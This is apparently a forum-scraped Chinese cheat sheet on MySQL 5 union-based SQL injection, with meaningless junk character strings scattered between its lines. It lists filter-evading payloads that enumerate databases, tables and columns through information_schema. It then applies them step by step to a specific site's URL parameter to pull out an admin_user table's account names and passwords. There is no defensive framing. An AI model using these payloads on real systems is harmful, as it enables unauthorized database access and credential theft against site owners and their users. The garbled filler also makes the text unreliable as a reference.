查库 |4 C$ Y9 S1 q: o; R6 n
2 J( w7 D+ z5 _" T- A' q
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/* }2 H0 C% @& c: [
6 W4 n- Y. ?8 _4 a6 e查表
$ F! d+ \# X Q) G* g2 o/ j% G% s+ P3 W$ Y1 k+ S% k7 C
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1; m2 [! f8 s- j# k( s' Z
- a2 x' g4 Q/ R/ f( K% t查段
8 E- U) G; p" g7 M' b
3 |) b9 R: p" [* f$ Y5 _id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
Z' }0 S2 h9 q4 w! X4 U7 v- @; T. Y
- y! }% N) C& [6 U& U; G
mysql5高级注入方法暴表9 b, \) c! ] u5 P" _
7 o1 q; u9 o( g( u! L0 Y2 a
例子如下:5 J, w: p1 `9 ^/ J1 _. Q
. F2 `& \7 X& x- r8 z9 Y9 B1.爆表' @4 F; t3 E/ u0 o3 H0 z5 D5 `
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
( I( r V( D4 [' p这样爆到第4个时出现了admin_user表。* K) q7 s( q: o: j3 \3 c, {& M, S, @
8 [- \7 B S! |6 l- r9 \% Y. b
2.暴字段
" f6 n7 F7 {1 M9 B- Z' phttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*/ @/ I- e4 F8 E
o3 o3 U9 @- G+ ?1 A
2 f* o" V4 l1 A8 ^
3.爆密码; u8 y; g1 L9 V; F9 Z
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
7 M8 t5 w. E6 H: D8 W
1 Z: F; ]0 w: M( d$ t8 ?$ s# K6 M
0 F# Q8 m5 @3 F, K: l. @6 \ |